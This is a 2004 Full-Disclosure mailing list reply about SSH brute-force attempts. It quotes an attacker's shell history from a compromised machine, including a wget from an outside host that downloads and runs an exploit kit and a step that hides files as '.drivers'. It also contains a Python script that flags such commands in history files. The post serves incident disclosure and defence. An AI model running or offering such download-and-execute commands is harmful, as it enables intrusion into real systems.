Re: [Full-Disclosure] Re: Automated SSH login attempts?
Date: Fri Jul 30 2004 - 08:36:02 CDT
Accidentally sent only to Stefan, so redoing it.
On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
> Hmmm - I have also been getting those login attempts, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:
I got a similar experience from a game box I look after
(void.labs.pulltheplug.com, but people may prefer
http://vortex.labs.pulltheplug.com, feel free to jump on the irc server
irc.pulltheplug.com, #social or #vortex).
The .bash_history is as follows:
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
tar zxv xpl.tgz
tar zxvf xpl.tgz
ps -aux |grep test
mv psy1985.tgz .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
inetd -e -o
It would appear that if they can't get a local root, they'll use the box for
Hopefully this helps someone. I haven't looked too much into this, if wanted
I could grab the source ip addresses used for logging into guest, but that's
probably not overly useful.
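A triage sketch for a .bash_history like the one quoted above, added here as an example and not part of the original message: it tags download, unpack, run-from-current-directory, move-to-dot-path and archive-deletion commands, and marks lines that both download and execute. The rule names and regexes are assumptions chosen for this illustration, not a complete detection set.

```python
import re

# History lines copied from the message above, used as sample input.
SAMPLE_HISTORY = """\
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
tar zxv xpl.tgz
tar zxvf xpl.tgz
ps -aux |grep test
mv psy1985.tgz .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
inetd -e -o
"""

ARCHIVE = r"\S+\.(?:tgz|tar\.gz|tar\.bz2|tar|zip)\b"
# Heuristic rules (assumptions for this example), matched per command.
RULES = {
    "download": re.compile(r"^(?:wget|curl|fetch|lynx|ftp)\s+\S"),
    "unpack": re.compile(r"^(?:tar\s+-?\w*x\w*|unzip|gunzip)\s+" + ARCHIVE),
    "run_local": re.compile(r"^\./\S+"),
    "move_to_dot_path": re.compile(r"^(?:mv|cp)\s+.*\s\.[^./\s]\S*$"),
    "delete_archive": re.compile(r"^rm\s+(?:-\w+\s+)*" + ARCHIVE),
}

def split_commands(line):
    # One history line can chain several commands with ; && || or |.
    return [c.strip() for c in re.split(r";|&&|\|\||\|", line) if c.strip()]

def triage(history_text):
    """Return (line number, tags, raw line) for every line that hits a rule."""
    findings = []
    for lineno, line in enumerate(history_text.splitlines(), 1):
        tags = []
        for cmd in split_commands(line):
            tags += [n for n, rx in RULES.items() if rx.search(cmd) and n not in tags]
        # A fetch and an execution on the same line is the strongest signal.
        if "download" in tags and "run_local" in tags:
            tags.append("download_and_execute")
        if tags:
            findings.append((lineno, tags, line))
    return findings

if __name__ == "__main__":
    for lineno, tags, line in triage(SAMPLE_HISTORY):
        print(f"{lineno:>3}  {','.join(tags):<50} {line}")
```

Lines that match no rule, such as `ps -aux |grep test` and `inetd -e -o`, are not reported and still need a manual read.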